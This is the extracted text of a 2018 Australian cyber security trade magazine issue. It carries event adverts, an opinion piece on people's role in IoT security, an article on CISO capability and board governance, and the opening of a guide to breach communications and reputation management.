Australian Cyber Security Magazine, ISSUE 4, 2018 by MySecurity Marketplace

THE MAGAZINE FOR AUSTRALIAN INFORMATION SECURITY PROFESSIONALS | www.australiancybersecuritymagazine.com.au

@AustCyberSecMag Issue 4, 2018

Protect your reputation after a breach Cryptocurrency Insecurity Ethereum Blockchain Identity Management Can we take people out of IoT Security?

Breach notification isnâ&#x20AC;&#x2122;t just about breach notification Spectre and Meltdown Hybrid Forensics Who is the most offensive tester in the room?

DATA BREACH M EM B ER F O C U S E D

INNO VATE

HOW ARE YOU MANAGING YOUR CYBER RISK? Attend the most comprehensive cyber conference in Australia! Participate in business tracks free of technical language, hear from international thought leaders in cyber and engage in workshops and training to equip you with a better understanding of how you can manage this risk.

Register now at cyberconference.com.au From only $275 Save up to $825 on conference fees by becoming an AISA member today and access the many benefits received by our membership network

OCT 9-11

2018

AUSTRALIAN CYBER CONFERENCE

BROUGHT TO YOU BY

aisa.org.au

Contents

Editor's Desk 5 Feedback loop - have your say! Editor Tony Campbell Director & Executive Editor Chris Cubbage Director David Matrai

Helping Australia build a secure healthcare network

Art Director Stefan Babij

MARKETING AND ADVERTISING T | +61 8 6465 4732 promoteme@australiancybersecuritymagazine.com.au

Spectre and Meltdown

Can We Take People Out of Internet of Things Security

The ASX 100 Cyber Health Check Report

Protecting your reputation

Spectre and Meltdown

XSSposing bugs via Shockwave Flash analysis

Moving to Silicon Valley

Fortinet’s security transformation plans

Hybrid forensics

Who is the most offensive tester In the room

Now what? I have to notify the OAIC?

AISA member focus 46

SUBSCRIPTIONS FOR AUSTRALIAN SECURITY MAGAZINE

Executive Editor’s interview (Extract) with David Kemp,

T | +61 8 6465 4732 subscriptions@australiansecuritymagazine.com.au

Breach notification isn’t just about breach notification

Everything you need to know about breach notifications

Cryptocurrency Insecurity

How India is coping with cyberthreats?

SMART ID: Ethereum blockchain identity management

Cyber Insurance - A Buyer's Guide Part 3

All Material appearing in Australian Security Magazine is copyright. Reproduction in whole or part is not permitted without permission in writing from the publisher. The views of contributors are not necessarily those of the publisher. Professional advice should be sought before applying the information to particular circumstances.

Who is the most offensive tester In the room

CONNECT WITH US www.facebook.com/apsmagazine SMART ID: Ethereum blockchain identity management

@AustCyberSecMag www.linkedin.com/groups/Asia-PacificSecurity-Magazine-3378566/about

Like us on Facebook and follow us on Twitter and LinkedIn. We post about new issue releases, feature interviews, events and other topical discussions.

Correspondents* & Contributors

www.youtube.com/user/MySecurityAustralia

Dan Lohrmann

Micheal Trovato

Wayne Tufek

Elliot Dellys

Jason Magic

Graeme Speak

David StaffordGaffney

Samantha Humphries

Guillaume Noé

www.australiansecuritymagazine.com.au

www.asiapacificsecuritymagazine.com

www.aseantechsec.com

www.drasticnews.com

Mark Luckin

Richard Adams

James Wooton

Annu Singh

Mark Jones

Sarosh Bana*

www.chiefit.me

www.youtube.com/user/ MySecurityAustralia

www.cctvbuyersguide.com

Editor's Desk

elcome to Issue 4 of the Australian Cyber Security Magazine. It’s hard to believe that we are already into April – Christmas seems like it was yesterday. Cyber security has again been in the headlines over the past few months – let’s face it, these days it’s rarely not in the news – with several largescale incidents, such as the one that affected Equifax, capturing much media attention. Globally, ransomware still dominates our incident response efforts, but the rise of cryptomining (more on that later) has become a modern irritation, where stealing CPU and GPU cycles – and electricity – is the new scourge affecting businesses and home users alike. Here in Australia, we’ve seen the introduction of new cyber security legislation mandating certain kinds of data breaches that relate to personally identifiable information (PII) must now be notified to all affected customers and the Office of the Australian Information Commission (OAIC). This new legislation is vague and is causing concern amongst the business community, since it’s often hard to determine what’s included and what is not, and what constitutes a reportable breach. Following on from the last issue, we have gathered together some more articles containing practical advice and guidance on mandatory breach notification, to help you understand what you need to do in advance, to prepare for such an incident. We had feedback last year that we didn’t have enough technical security articles, so we’ve taken that advice on board and included deeper investigations into forensics, malware analysis and a technical analysis of Shockwave Flash. We’re privileged to hear from Richard Adams, who explains hybrid forensics, an approach designed to address the problems of dealing with massive data volumes and large networks, and regular author, Guillaume Noé, walks us through the issues faced by investors looking to get in on the cryptocurrency gold rush. It’s funny when we look at the latest threat faced by businesses, insomuch that it’s a wonder this hasn’t happened before. Cryptomining is the unauthorised installation of cryptocurrency mining applications either on a website, where the activity runs as illicit script in the browser, or rogue system administrators are installing cryptomining software on the systems they look after, to steal processing time and electricity from their places of work to mine for bitcoin (or any number of other alternative currencies). We decided to commission some blockchain articles for this issue, since it’s such a hot topic now and has a connection to cyber security

in that the underlying technology is a public key infrastructure model of distributed trust. Cryptocurrencies are the primary application focused on by the public and media today, however, the blockchain ecosystem has unfathomable application in the real world, not restricted to currency and moving financial value from one party to another. Annu Singh’s article, Smart ID: Ethereum Blockchain Identity Management, looks at how Smart ID running on the blockchain ecosystem known as Ethereum offers a viable option for individuals, corporations and governments, for introducing efficiencies into the process lifecycle of identity management. Prime examples are in land sales and electronic passports, so Annu explain how this works and enlightens us on how wide the applicability of this new technology really is. James Wooton, one of Sydney’s most experienced penetration testers, talks us through the decision-making process for hiring testers, while Mark Luckin runs through several interesting scenarios relating to cyber insurance payouts in the third instalment of his series on cyber insurance. Finally, Graeme Speak, CEO of Australian cyber start-up BankVault, talks about his journey to Silicon Valley and explains why he’s relocated offshore to further build his business. This is a fascinating story and has a few hard lessons for those trying to encourage start-ups to stay at home. We hope you enjoy this issue of the ACSM and as usual, we welcome your comments, suggestions and requests for things you’d like us to cover in the future. Until next time, stay vigilant and keep yourself cyber-safe. Tony Campbell EDITOR

WRITE FOR US! The Australian Cyber Security Magazine is seeking enthusiastic cyber security professionals who are keen on writing for our magazine on any of the following topics: • • • • • • • • •

Reac h over out to 10 indu ,000 profe stry s per msionals onth !

Digital forensics in Australia Workforce development Security in the development lifecycle Threat management and threat hunting Incident management Operational security Security book reviews Risk management True crime (cybercrime)

If you are interested in writing for us, please send your article pitches (no more than 200 words) to the editors’ desk at: editor@australiancybersecuritymagazine.com.au

Interested in Blogging? You may or may not be familiar with our website, which also provides daily infosec news reviews, as well as our weekly newsletters. We’d like to hear from anyone who’d be interested in contributing blog posts for our platform that reaches out over 10,000 industry 6 | Australian Cyber Security Magazine

professionals per month, where you can express your opinions, preferences, or simply rant about the state of the cyber security world. If you stay on topic and stick to the facts, we’ll be happy to publish you. If interested, email the editors at : editor@australiancybersecuritymagazine.com.au

FEEDBACK LOOP - Have Your Say! There are many ways that you can provide feedback to us and

single one of you and publish the best discussion pieces in each

converse with our editorial board, but we’re establishing this

issue in this new standing section, entitled Feedback Loop.

regular feature in the Australian Cyber Security Magazine because

To thank you for your feedback, we’ll provide a token of

conversations can change the world. It is encouraging to see that

our appreciation for the best letter in every issue. As this is the

so many of you are already so vocal on some of the big issues

inaugural issue we don’t have any feedback yet, so let’s cut to the

affecting Australia, voicing your opinions on LinkedIn, blogs and

chase. The prize for the best letter in issue 4 will be a complete set

at industry conferences. We will endeavour to respond to every

of social engineering guru, Chris Hadnagy’s three amazing books.

Phishing Dark Waters: The Offensive and Defensive Sides of Malicious Emails An essential anti-phishing desk reference for anyone with an email address. Phishing Dark Waters addresses the growing and continuing scourge of phishing emails, and provides actionable defensive techniques and tools to help you steer clear of malicious emails. Phishing is analysed from the viewpoint of human decision-making and the impact of deliberate influence and manipulation on the recipient. With expert guidance, this book provides insight into the financial, corporate espionage, nation state, and identity theft goals of the attackers, and teaches you how to spot a spoofed e-mail or cloned website. Included are detailed examples of high profile breaches at Target, RSA, Coca Cola, and the AP, as well as an examination of sample scams including the Nigerian 419, financial themes, and post high-profile event attacks. Learn how to protect yourself and your organization using anti-phishing tools, and how to create your own phish to use as part of a security awareness program.

Unmasking the Social Engineer: The Human Element of Security The Human Element of Security focuses on combining the science of understanding non-verbal communications with the knowledge of how social engineers, scam artists, and con men use these skills to build feelings of trust and rapport in their targets. The author helps listeners understand how to identify and detect social engineers and scammers by analysing their non-verbal behaviour. Unmasking the Social Engineer shows how attacks work, explains nonverbal communications, and demonstrates with visuals the connection of non-verbal behaviour to social engineering and scamming.

Social Engineering: The Art of Human Hacking The first book to reveal and dissect the technical aspect of many social engineering manoeuvres. From elicitation, pretexting, influence and manipulation all aspects of social engineering are picked apart, discussed and explained by using real world examples, personal experience and the science behind them to unravelled the mystery in social engineering.

Australian Cyber Security Magazine | 7

25 – 27 JULY 2018

SECURING INNOVATION The 2018 Security Exhibition + Conference: Powered by ingenuity and invention, showcasing the latest technology and cutting edge thinking. From physical and electronic solutions, to biometrics and cyber security. Australia’s largest security event offers three days of business networking and intelligence sharing. Take a first-hand look at what’s next for the security environment including intelligence on managing threats and identifying risks.

MELBOURNE CONVENTION + EXHIBITION CENTRE EXHIBITION IS FREE REGISTER NOW securityexpo.com.au

#security2018

8 | Australian Cyber Security Magazine

INTRODUCING OUR MEDIA CHANNELS Bringing all of the MSM channels together on one platform for the latest and greatest in security, technology and events from across the Asia Pacific and the world. Now available on Apple and Android platforms.

Technology channel partner ecosystem platform with a natural focus on Big Data, Internet of Things and fast emerging technologies

Dedicated channel for all things about Drones, Robotics, Autonomous systems, Technology, Information and Communications

Your one-stop shop for all things CCTV, surveillance and detection technologies

The regionâ&#x20AC;&#x2122;s newest government and corporate Technology and Security magazine, with a focus on the Southeast Asia region and the 10 ASEAN member nations

Commenced in November 2017, the Cyber Security Weekly Podcast has surpassed 30 interviews and provides regularly updates, news, trends and events. Available via Apple & Android

E TUN IN ! NOW

Australian Cyber Security Magazine | 9

Cyber Security

Can we take people out of IoT security?

H By Dan Lohrmann

ow can we provide better security for Internet of Things (IoT) devices? Yevgeny Dibrov writes that cybersecurity can be improved solely with technology improvements. I disagree. Here’s why I believe removing people from IoT security is ‘mission impossible.’ I recently read an intriguing Harvard Business Review (HBR.org) article by Yevgeny Dibrov, titled: The Internet of Things is Going to Change Everything About Cybersecurity. This well-written and thought-provoking opinion piece begins with the reality that cyber threats are exploding globally and data breaches have led mainstream businesses to spend over $93 billion in 2017 on stopping cybercrime. Furthermore, cyberattacks against Internet of Things (IoT) devices are skyrocketing even faster, causing Congress to get involved. Gartner anticipates that a third of hacker attacks will target "shadow IT" and IoT by 2020. In our scary new normal online, I certainly agree with Dibrov that: “Executives who are preparing to handle future cybersecurity challenges with the same mindset and tools that they’ve been using all along are setting themselves up for continued failure.” No doubt, old methods of defending enterprises from cyberattacks are failing and new security solutions are certainly needed. So, what is the author’s solution?

10 | Australian Cyber Security Magazine

Answer: Take people out of the security equation. Dibrov writes: “It can’t be denied, however, that in the age of increased social-engineering attacks and unmanaged device usage, reliance on a human-based strategy is questionable at best… It only took one click on a link that led to the download of malware strains like WannaCry and Petya to set off cascading, global cybersecurity events. This alone should be taken as absolute proof that humans will always represent the soft underbelly of corporate defenses. …” The article goes on to explain that the “Amazon Echo is susceptible to airborne attacks,” and “Users may have productivity goals in mind, but there is simply no way you can rely on employees to use them within acceptable security guidelines. IoT training and awareness programs certainly will not do anything to help, so what’s the answer? It is time to relieve your people (employees, partners, customers, etc.) of the cybersecurity burden.” My Response: Wrong answer. While I certainly agree that humans are often the weakest link in online security and we must do better at equipping staff, relieving your people from the cybersecurity burden is going in the wrong direction. People use the technology, and their actions, and the processes that are followed, will always be essential

Cyber Security

potential number of mistakes that can be made by end users. However, pitting effective security awareness training and/or a positive security culture against better technology is a serious mistake and ultimately leads down a path to dismal failure. History has taught us that lasting security answers must include “all of the above,” with people, process and technology working together well.

A Short History Lesson Regarding Cybersecurity

components of effective security strategies with the myriad new Internet of Things devices. The conventional wisdom remains true that solutions must involve people, process and technology answers. As I have written in the past, most experts say the largest percentage of our security challenges involve user actions (or interactions). Nevertheless, I am willing to concede that the percentage breakdown assigned to each category is open to debate and may be different for various products, services, companies and/or IoT devices. But before I explain in more detail why I part ways with respected CEO and co-founder of Armis, I want to say that I certainly agree that we need much better security built into IoT devices. I certainly think IoT security is at the cutting edge of cyber issues, and I share Dibrov’s sceptical view that we can keep doing the same things and get different results — in all three categories. Without hesitation, almost everyone except criminal hackers would love to have IoT devices ship “secure by default” or “secure by design” with a hack-proof seal of approval on every IoT box that ships. There is no doubt that much more needs be done with the security built into all technology, and it would be great if we could drastically reduce IoT security flaws and the

As I ponder these concepts and especially promises of more IoT security built-in up front, I can’t help but think back more than a decade to the Bill Gates promise of better security. Here’s a very brief history reminder from the days of Microsoft’s Trustworthy Computing. On Jan. 23, 2003, Bill Gates wrote these well-known "Secure by Design" words: “Secure by Default: In the past, a product feature was typically enabled by default if there was any possibility that a customer might want to use it. Today, we are closely examining when to pre-configure products as "locked down," meaning that the most secure options are the default settings. For example, in the forthcoming Windows Server 2003, services such as Content Indexing Service, Messenger and NetDDE will be turned off by default. In Office XP, macros are turned off by default. VBScript is turned off by default in Office XP SP1. And Internet Explorer frame display is disabled in the "restricted sites" zone, which reduces the opportunity for the frames mechanism in HTML email to be used as an attack vector. …” While I applauded these laudable goals more than a decade ago along with other important steps taken by Microsoft to improve security, the sad truth is that many hundreds of "Patch Tuesdays" have come and gone, with more hacked systems than ever before in 2017. The promise of “secure by default” is far from reality across the technology industry software, hardware and even cloudhosted services. Beyond Microsoft, other companies have the same issues with technology bugs and security holes that hackers eventually find. Even when technology products ship with all security settings enabled, which is not the case with many IoT devices, end users often turn off security features or fail to download critical security updates or don’t follow recommended practices such as changing default passwords. Yevgeny Dibrov is not the first one to suggest that technology can be made secure regardless of people’s actions, and he won’t be the last. However, I am somewhat surprised that this viewpoint remains popular as we head into 2018. Why? Beyond software development flaws, we have witnessed decades of insider threats caused by people like Edward Snowden and others who were able to use processes and weaknesses in people to overcome sophisticated data protections. There is simply no way that IoT manufacturers will spend the kind of dollars on security that the National Security Agency (NSA) spends on technology to protect

Australian Cyber Security Magazine | 11

Cyber Security

national secrets. And yet, even those technology defenses were able to be defeated by social engineering weaknesses exploited by Snowden — such as colleagues giving away their passwords. External hackers use those same techniques today, as demonstrated at security conferences like RSA. Recent cyberattacks against bitcoin exchanges represent another example of how attacks will go after weaknesses in people and process, despite solid technology which is supposedly "hack-proof." Just last week a South Korean bitcoin exchange declared bankruptcy after the second attack in less than a year. This situation developed after commentators still maintain that the bitcoin currency cannot be hacked. Perhaps true, but your bitcoin wallet can still be raided. Similar problems will continue to occur with IoT devices in the future.

Fun Movie and TV Examples to Help Understand the Role of People in Security I want to recognize that Dibrov says: “It may be prudent, and required, for you to continue with awareness programs, but you will have to rely more on intelligent technologies and automation if you hope to have any chance at success. …” I certainly agree. Nevertheless, the reality is that the main point of his article comes from the last sentence at the end of the article: “It’s time to remove people from the discussion and move towards a more intelligent, secure future.” Really? Take people out of the security discussion? Side note: I immediately posted this article to my LinkedIn and Twitter feeds and received a flood of similar comments to what I am writing in this rebuttal. Some of those same comments from colleagues appear at the bottom of the article at HBR.org. Furthermore, to keep this simple, I’d like to offer a fun illustration of why people cannot be removed from the central security discussion. In the (fictional) film series Mission Impossible, the most sophisticated technical security controls are consistently overcome via weaknesses exploited in people and process hacks. Ethan Hunt (played by Tom Cruise) and a wide assortment of men and women spies in the fictional U.S. Impossible Mission Force (IMF), face an untold number of highly improbable and dangerous tasks that are actionpacked, over-the-top and fun to watch. One common theme throughout these five movies (with number six coming in 2018) is how people can still defeat the most sophisticated technology safeguards put in place. Sadly, hackers overcoming state-of-the-art technology defenses are not just for the movies or TV shows like Mr. Robot. We have seen an untold number of ways that IoT devices can be hacked by tricking people into doing things or not following recommended best practices for security. Sadly, hacking IoT devices is often easier than Tom Cruise pulling off one of his movie stunts. Everyone certainly agrees with the goal to build moresecure IoT devices. Humans certainly make mistakes, and we should aim to automate as much security as possible. Just as we safely fly planes on autopilot, shouldn’t we strive

12 | Australian Cyber Security Magazine

to build human-proof smart devices that are secure out of the box? Of course. And ... I am all for more-secure IoT devices that remove the potential for most end-user errors or security mistakes. Nevertheless, training and working with people and processes to protect data will never be an optional extra for secure enterprises, homes or individuals.

A False Choice The HBR article by Yevgeny Dibrov appears to offer an attractive answer because it promises IoT security solutions without the very hard to change enterprise security culture. It offers a false hope by eliminating “reliance on a human-based strategy” and offering better security with a perfect technology-driven, or bolt-on tech solution, for all IoT devices. Managers imagine saving significant money by reducing the time required for staff to be trained and/ or understand and implement appropriate (and secure) business processes with innovative technology. This invented conflict is similar to another security paradox from a few years back that asked the question: Are data breaches inevitable? Most people now say "yes" without hesitation, but Invincea CEO Anup Ghosh told Washington news site DC Inno that breach prevention is possible, proclaiming “breach inevitability” is just marketing. As I wrote at that time, we need a third answer that adopts all the wisdom contained in the NIST Cybersecurity Framework regarding cyber incident and data breach prevention as well as incident response. The same holistic approach is required for IoT security. Let’s not sacrifice one security best practice in exchange for another, as if we need to pick technology protections over enabling people with better awareness training and engaging in cyber exercises. The NIST guidance encourages an assessment of all cyber-risks with prioritization based upon your specific situation. It recommends that solutions contain end-user training, technical training for developers and system administrators, cybersecurity exercises, management briefings, repeatable technology upgrade processes and much more. Don’t skip over important sections of the NIST Cyber Framework.

Final Thoughts Better cybersecurity protections for IoT requires improvements in people, process and technology. So, let’s not pit people issues against technology protections in a fight for dollars — nor pretend that a perfect black box is coming that will enable IoT nirvana, while removing people and process from the security equation. Bottom line: The Edward Snowden story can teach many important security lessons. But no security message is more central than this: People, and their actions, will always matter in cybersecurity. So, can we remove people from the IoT security discussion? Mission Impossible!

Cyber Security

The ASX 100 Cyber Health Check Report. What’s next for your board - PART II

hortly after the release of the ASX 100 Cyber Health Check Report, I wrote about the next steps for boards. Although the arc of progress described in the ASX Report is tilted towards goodness, it is also clear much needs to be done. At that time, I recommended:

By Micheal Trovato

1. 2.

3. 4.

Make sure the board has sufficient cyber security expertise or advisors; Encourage your Chief Information Security Officer to build governance skills in finance, risk, strategy, legal, and compliance; Use the results of the ASX Report for discussion at your next board meeting; Commence or update your organisation’s detailed cyber security strategy and report on the security transformation program regularly; Include cyber security as a quarterly agenda item, or

more often as needed; 6. Measure your board’s performance in this critical area; and 7. Learn from peers on other boards. Last time I focused on experience and expertise of the board. Most importantly, expertise at a board level comes from knowing the “that, how, and why” of cyber security and having the right practical experience. This implies having an experienced cyber security person on the board, audit and risk committee, or as an advisor to the board. In this article, I want to focus on the Chief Information Security Officer’s experience and the board. Many organisation are putting well qualified cyber security skilled people in CISO or CISO-light roles and then expecting them to be well rounded and be able to interact with boards or their committees. Regrettably,

Australian Cyber Security Magazine | 13

Cyber Security

"They recommend that organisations start with the question, “What level of CISO do you have?” and ask yourself what is the current organisational attitude towards cyber. Then assess the current role/person against the CALM Model and determine what level CISO the organisation has." these CISOs function with a lot of day-to-day stress, in roles that are within organisations that have values and cultural misalignments, without sufficient mandate from the executive or board, and without resources to execute effectively. All this in an environment that is so fraught with danger, that any CISO should sign on only with a 6-12-month redundancy package. Why? After a breach, the organisation may feel it necessary to make a statement to stakeholders that it is doing something, even if it is not the fault of the CISO. Their jobs are in jeopardy daily and the gap between the board understanding and experience with privacy and cyber security compounds the difficulty of communicating and working with the CISO.

The ASX 100 Cyber Health Check Report, as a baseline – where is the CISO? The ASX Report says that it “can act as a baseline where companies can see how they rate against their peers and can take practical steps to improve their cyber security.” Further, in the report, cyber security is often the domain of theoard’s audit or risk committees (64% of respondents), allowing a subset of directors with relevant skills to focus on cyber risk. Considering the maturity of cyber security governance in Australia, this is the result I would expect and those committees are probably the most qualified to evaluate cyber risk. The ASX Report did not go to the next level – looking at the most senior cyber executive – and while the board’s job may stop at hiring the CEO and then the CEO hires the CISO, there was not a view as to the CISO’s capabilities. This was a disappointment, as this person is critical to the organisation.

It depends on your CISO’s capabilities and strategic industry focus… While retained search firm Russel Reynold’s (RR) carried out

14 | Australian Cyber Security Magazine

cyber search assignments, they realised that while there had been considerable progress on defining standards and approaches for dealing with cyber security, including the widely adopted US NIST cyber security framework, there was little clarity on understanding what “good” looked like, in the leadership of the cyber security function. Cyber security is a pervasive risk and an arcane, deep, and fast-moving area of knowledge, and CISOs are expected to understand the “that” and the “how”, as well as the “why” of cyber security. But many struggle to communicate and work with business leaders and boards and give the benefit of their experience, hampered by their lack of similar board experience or soft skills.

Russell Reynolds CISO Assessment Level Model (CALM) http://www.russellreynolds.com/insights/thought-leadership/ cyber-security-the-ciso-assessment-level-model-calm Russell Reynolds developed a CALM Model that shows four levels of CISO: Level 1 (the lowest level) represents about 60% of the market and Level 4 represents less than 100 people worldwide, most of whom are in the US. Level 1’s are mostly existing heads of IT security and are largely focused on governance and controls. Level 4’s are deeply intimate with their businesses; they are involved in the background, in senior hirings and firings, M&A, divestments, supply chain, IP protection and anything shareholder sensitive. They also have regular sessions with the chairman of the main board and train non-executives. They recommend that organisations start with the question, “What level of CISO do you have?” and ask yourself what is the current organisational attitude towards cyber. Then assess the current role/person against the CALM Model and determine what level CISO the organisation has. Then ask where the organisation wants to get to, and over what period does it want to get there? Then work out what approach is currently taken to cyber risk management in the organisation. You now have a good view on how sophisticated the organisation currently is in its thinking and approach to cyber security. Next, look at the table that focuses on what a CISO does. Work your way down the table through some of the observations and see if you can figure out either what the current capability of the CISO is, or what the future requirement will be. You now have a more refined view of what level of CISO is most likely to succeed in the organisation going forward.

Is that enough? While organisations continue to evolve these roles, sometimes upgrading the role a couple of times over years as part of the process, they often neglect the well roundness of the role. I’ve had the benefit of working in the industry for 10 years and 20+ years in “Big 4” firms as a consulting partner in the US and Australia. As part of my career journey, I earned an MBA in Accounting and Finance and BS in Management Science, Computing, and

Cyber Security

Psychology. And along the way, I had multiple opportunities to gain experience in governance and risk at the board and executive level – building the financial, legal, strategy, and risk skills as well as the ability to analyse, synthesise and communicate. Many CISOs, due to their technology and operations career paths, have not had this experience – but it is critical that they be willing to step away from some of the technical aspects of information security, while keeping up-to-date with technical knowledge and certifications, and learn business language, softer communication and presentation skills. Some suggested key activities: 1.

Read the AFR, Wall Street Journal, or FT – or other business publications that build business knowledge and learn to speak the language of business and understand today’s issues. 2. Increase education and training in business – an MBA being a good choice. 3. Do a stint in a consulting firm – while many people may find this a big leap, the experience gained is invaluable. 4. Graduate from the Company Directors Course from the Australian Institute of Company Directors (AICD) or similar in your geography. 5. Join ISACA or ISC2 and obtain certifications like CISM or CISSP to demonstrate credentialed trust, risk, and governance skills and leverage your technical skills – regulators may soon require this.

6. Join non-profit boards and gain the experience of being on boards – ideally doing something that you love to do – you may even discover a new career. 7. Develop relationships with executives so they are aware of your knowledge and skills, will begin to trust you, and will see you as a good choice for an executive position. That last item offers an interesting side-bar. Boards need to get comfortable with two things: 1.

That the potential cyber security skilled board members or CISOs are not a danger. Let’s face it - with the level of leaking going on and the high-profile debacles caused by possibly well intentioned, but questionable individuals and values – should they trust us? In the end they will need to, and it will be to their advantage – but being able to empathise and understand what a board must do to vet candidates is critical. 2. They must understand how we will bring value. This will be difficult if they can’t see a person that can contribute through all areas of the board competence – not just with respect to cyber security expertise. For most boards today, they are outgunned by cyber criminals. Getting the right knowledge and experience integrated into the board and CISO will be essential to achieve the desired outcomes of organisational resilience. There is much work still to be done.

CivSec 2018 CyberSecurity Magazine.qxp_CivSec2018 CyberSecurity Magazine 22/03/2018 2:14 PM Page 1

CYBER SECURITY TO PROTECT THE NATION AND SOCIETY

CivSec 2018 CIVIL SECURITY CONGRESS AND EXPOSITION

1-3 MAY 2018 MELBOURNE Learn how government and industry will preserve security, safety and sovereignty for the Indo-Asia-Pacific against conventional and cyber threats now and in the future. Hear:

See: l l l l l

Cyber security careers forum Industry and technology exhibition Innovation showcase High level strategic summits Specialist conferences and symposia

Admission is Free

BE OUR GUEST!

l l l l l

DPMC Deputy Secretary Cyber Security, Alastair MacGibbon AFP Cyber Crime Ops Manager, Commander David McLean Telstra GM Cyber Operations, Grant McKechnie AustCyber CEO, Craig Davies Oceania Cyber Security Centre, Professor Chris Leckie

www.civsec.com.au

Registration is Essential

DON’T MISS IT!

Australian Cyber Security Magazine | 15

Cyber Security

Protect your reputation after a breach

D By Wayne Tufek

ata breaches expose everything from government identifiers to user account log-in names and passwords. Criminals can use the stolen information such as name, address and date of birth, to file false tax returns, order credit cards and to take money from bank accounts. If you use the internet and have provided your personal details, you’re most likely a victim of at least one data breach. Data breaches are inevitable and waiting for a breach to occur before designing and testing an incident response plan is a recipe for failure. It’s now a question of when your organisation will be breached and how you will respond, not if you will be breached. 100% prevention simply doesn’t exist, so having a plan to deal with a security breach is now more important than ever. You probably already have an incident response plan, from a technical perspective with defined phrases such as preparation, identification, containment, eradication and lessons learned. Given the severe reputational damage that can arise from a high-profile data breach, a marketing and communications plan, along with a technical response plan, is now a necessity. Security heads must now learn about public relations and crisis management, as the changing facets of information security force the role to move from a technologist to a business leader and risk manager. As the role changes, you must now consider in

16 | Australian Cyber Security Magazine

the event of a breach what is required for communication to your customers, regulators, shareholders and to the general public. What will be communicated, how it will be communicated and what will be done to remedy the situation, must all be communicated quickly and across multiple mediums to the right audience. Honesty, transparency and accepting accountability are key to successfully saving your organisations reputation in the court of public opinion. Breaches are inevitable, but data theft is not. Remember, focusing on all five elements of a comprehensive security program: identify, protect, detect, respond and recover, will provide full circle protection and allow you to manage your risk. In AON’s 2015 Global Risk Management Survey (http:// www.aon.com/2015GlobalRisk/) the number 1 risk that keeps senior managers and risk leaders awake is “damage to reputation and brand”. Interestingly enough, at number 7 was “business interruption” and at number 9 was “computer crime/hacking/viruses/malicious codes”. An information security breach can certainly give rise to the number 1, 7 and 9 of the top ten risks. Whilst every incident that becomes a crisis must be handled in a different way, there is one factor common to all crises, and that is communication. How communications are handled with your stakeholders is critical in protecting your organisations

Cyber Security

Ordinarily, information security professionals have not had to think too much about public safety, but as more and more smart devices become connected to physical infrastructure, cyberattacks will have an increasing and potentially devastating impact on the physical world.

reputation. How an incident is communicated can either significantly help or hurt how affected customers, employees and shareholders view the company. A crisis in itself can create three types of threats, a threat to public safety, a financial loss to the organisation and/or a loss of reputation. Ordinarily, information security professionals have not had to think too much about public safety, but as more and more smart devices become connected to physical infrastructure, cyber-attacks will have an increasing and potentially devastating impact on the physical world. Some industries will see this before others, such as transport management systems, vehicles (think driver-less cars) and hospitals. What is inevitable is the convergence of physical security and information security. Physical security is concerned with the safety and preservation of life and now it will be part of the purview of the information security professional. A failure in information security may result in the loss of human life, as information security professionals we can no longer consider security to be just about the confidentiality, integrity and availability of information. In early 2016, law firm Mossack Fonseca experienced a huge data breach. Eleven million documents were leaked revealing the details of how the rich and famous use tax havens to hide their wealth. The fallout from the breach

included the resignation of the Prime Minister of Iceland, for not declaring ownership of a substantial company shareholding. If you needed tax advice would you go to Mossack Fonseca? I’m thinking you wouldn’t. Loss or damage to an organisations reputation is the number one risk that keeps senior business managers awake at night. Reputation and brand are closely related, but are different, even though the terms are sometimes used interchangeably. Brand is owned by an organisation. It is the organisations promise to its people; it is what the organisation would like its stakeholders to believe is true. Reputation on the other hand is owned by the organisations stakeholders, it is their collective perception of what they believe to be true. An organisations reputation strengthens its brand, but brand does not greatly influence reputation. A data breach in a worst-case scenario will turn into a crisis. When responding to security incidents, often it’s a case of Murphy’s Law – “what can go wrong, will go wrong, in the worst possible way”. In this type of situation, it is important to protect your organisations reputation by communicating the right message, to the right people at the right time. A key part of crisis management is to have a plan and update it annually. Have a designated team were each member has defined responsibilities. Test the plan annually, this is very important, if you’ve never tested your plan, how do you know that it works? How will the people involved in responding to the incident know what to do if they haven’t had a chance to practice? The table on the following page provides you with some help in determining and assigning tasks and explaining who will do what part of the communications data breach response. It should be used as a guide and tailored to your individual organisation as required. Each of the actions is explained below: • Advises: This individual or group provides input into the steps to be completed or the process to be performed. • Owner: The individual or group that administers, oversees or manages the process, function or steps. • Implements: The individual or group that performs the function, steps or actions in accordance with the owners wishes. • Updates: This party receives updates on status and

Australian Cyber Security Magazine | 17

Cyber Security

Activity

CMO

CEO

Comms Manager

CIO

CFO

COO

CISO

Legal Counsel

CHRO

Form the team

Owner/ Implements

Updates

Determine incident facts and current status

Updates

Owner

Updates

Implements

Updates

Obtain outside PR/ comms assistance

Advises

Updates

Owner/ Implements

Updates

Obtain outside IR assistance

Updates

Owner/ Implements

Updates

Prepare communications

Advises

Owner/ Implements

Advises

Approve communications

Advises

Owner

Advices

Advises

Notify OAIC?

Advises

Advices

Advises

Owner

Updates

Issue communications via channels

Updates

Owner/ Implements

Updates

Monitor social media and stakeholder reactions

Updates

Owner/ Implements

Updates

progress from the Owner.

Advises: This individual or group provides input into the steps to be completed or the process to be performed. Owner: The individual or group that administers, oversees or manages the process, function or steps. Implements: The individual or group that performs the function, steps or actions in accordance with the owners wishes. Updates: This party receives updates on status and progress from the Owner.

You should consider using an outside public relations firm, if you don’t have the skills in-house. A crisis can be defined as the “sudden and unexpected creation of victims, accompanied by unplanned visibility for the organisation”. A serious data breach can certainly meet this definition; the release of personal information can lead to identity theft, and in some cases depending on the information, extortion, and in a worst case scenario suicide (http://www.abc.net.au/news/2015-08-25/ashley-madisonhack-two-people-may-have-committed-suicide/6721840). To prepare, pre-draft your crisis messages and website content ahead of time. Mounting a response to a data breach occurs long before the breach actually happens. A key challenge in a crisis, is to minimise negative or hostile media coverage, that can undermine the confidence of your customers, employees, shareholders and business partners. Your communications should be quick to establish yourself as the best source of information regarding the breach, explaining what has happened, what your organisation is doing to fix the problem and how you’re keeping any victims safe. In a crisis situation, most commonly, a “holding statement’ is issued, as soon as possible. A holding statement provides the media with an initial statement that sets out the basic facts about the incident and lets people know that you’re dealing with the situation. The holding statement should contain as much factual information as is available, however limited it may be, together with a firm commitment to provide further information when it comes to hand. Your statement should describe the immediate

18 | Australian Cyber Security Magazine

